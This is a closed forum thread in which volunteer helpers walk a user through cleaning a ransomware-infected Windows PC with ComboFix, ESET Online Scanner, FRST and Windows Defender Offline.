 

 

 

NEXT:

Download ComboFix from here and save it to your desktop.

http://download.bleepingcomputer.com/sUBs/ComboFix.exe

Disable your AntiVirus and AntiSpyware applications, usually via a right click on the System Tray icon. They may otherwise interfere with ComboFix.

You can get help on disabling your protection programs here:
http://www.techsupportforum.com/security-center/virus-trojan-spyware-help/490111-how-disable-your-security-applications.html

Double click on ComboFix.exe & follow the prompts.

Your desktop may go blank. This is normal. It will return when ComboFix is done. ComboFix may reboot your machine. This is normal.

When finished, it shall produce a log for you, C:\ComboFix.txt. Attach that log in your next reply.

NOTE: If you encounter a message "illegal operation attempted on registry key that has been marked for deletion" and no programs will run - please just reboot and that will resolve that error.
 

Link to post
Share on other sites

I mentioned those "ransom" related items for information.  Just that.  It would be of interest to you to read and see just what they said, and if there is the name of it in there.

Not necessarily to delete them.

 

But what you do need to do is to go ahead and go forth with running TFC + Combofix.

Link to post
Share on other sites

Maybe I may have overlooked, but this pc does not have a installed antivirus program.   Why?

It has to have one installed otherwise it is wide open for infection by viruses.

 

I notice it appears that on or about November 11 it was hit by a ransomware.

 

Disable your AntiVirus and AntiSpyware applications, usually via a right click on the System Tray icon. They may otherwise interfere with our tools
For directions on how, see http://www.bleepingcomputer.com/forums/index.php?showtopic=114351
How To Temporarily Disable Your Anti-virus, Firewall And Anti-malware Programs
Do NOT turn off the firewall

Close all open browsers at this point.

Start Internet Explorer (fresh) by pressing Start  >> Internet Explorer >> Right-Click and select Run As Administrator.
Using Internet Explorer browser only, go to ESET Online Scanner website:
http://www.eset.com/onlinescan/

Accept the Terms of Use and press Start button;

Approve the install of the required ActiveX Control, then follow on-screen instructions;

Enable (check) the Remove found threats option, and run the scan.

After the scan completes, the Details tab in the Results window will display what was found and removed. A logfile is created and located at C:\Program Files (x86)\Eset\EsetOnlineScanner\log.txt. Look at contents of this file using Notepad.

The Frequently Asked Questions for ESET Online Scanner can be viewed here
http://go.eset.com/us/online-scanner/faq

It is emphasized to temporarily disable any pc-resident {active} antivirus program prior to any on-line scan by any on-line scanner.
(And the prompt re-enabling when finished.)   

If you use Firefox, you have to install IETab, an add-on.  This is to enable ActiveX support.
Do not use the system while the scan is running. Once the full scan is underway, go take a long break  


Re-enable the antivirus program.

Reply with copy of the Eset scan log
 

Link to post
Share on other sites

I'll get right on it. And I do. I had Microsoft Security Essentials, and about a day or two before the ransomware I got Malwarebytes Premium. I installed it and everything, it worked, and after I thought I had cleaned my computer, I uninstalled Microsoft Security Essentials. Then the ransomware hit.

Link to post
Share on other sites

Hello,

 

When you tried to go to and run the ESET online scan, did you use Internet Explorer browser ?

 

I would like for you to locate the FRST64.exe you have in the Downloads folder.  I need a fresh set of reports.

Close any opened windows / apps.

Then run FRST64.exe

When replying, attach  the latest FRST.txt + Addition.txt

 

I suggest you get and run the Microsoft Windows Defender Offline. This is an "offline" tool that you boot the pc with and scan your system for malware.
To get started, find a blank CD, DVD, or USB flash drive with at least 250 MB of free space and then download and run the tool—the tool will help you create the removable media.

The basic sequence of steps are
a) Download and SAVE the tool to a unique folder/location on your pc  
b) Create the CD/DVD/USB-flash drive with tool (read all the directions at Microsoft {below} on how to make the media )
c) Set pc to boot from the offline media
d) Place media in & restart system
e) Run the tool.  Have infinite patience & have it scan the entire system. Remove any malware that is found.

Download & info link  http://windows.microsoft.com/en-US/windows/what-is-windows-defender-offline

The frequently asked questions for this tool
http://windows.microsoft.com/en-US/windows/windows-defender-offline-faq
 

Link to post
Share on other sites

  • 2 weeks later...

Due to the lack of feedback this topic is closed to prevent others from posting here. If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this thread with your request. This applies only to the originator of this thread.

Other members who need assistance please start your own topic in a new thread. Thanks!

Link to post
Share on other sites

Guest
This topic is now closed to further replies.
 Share

  • Recently Browsing   0 members

    No registered users viewing this page.

Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.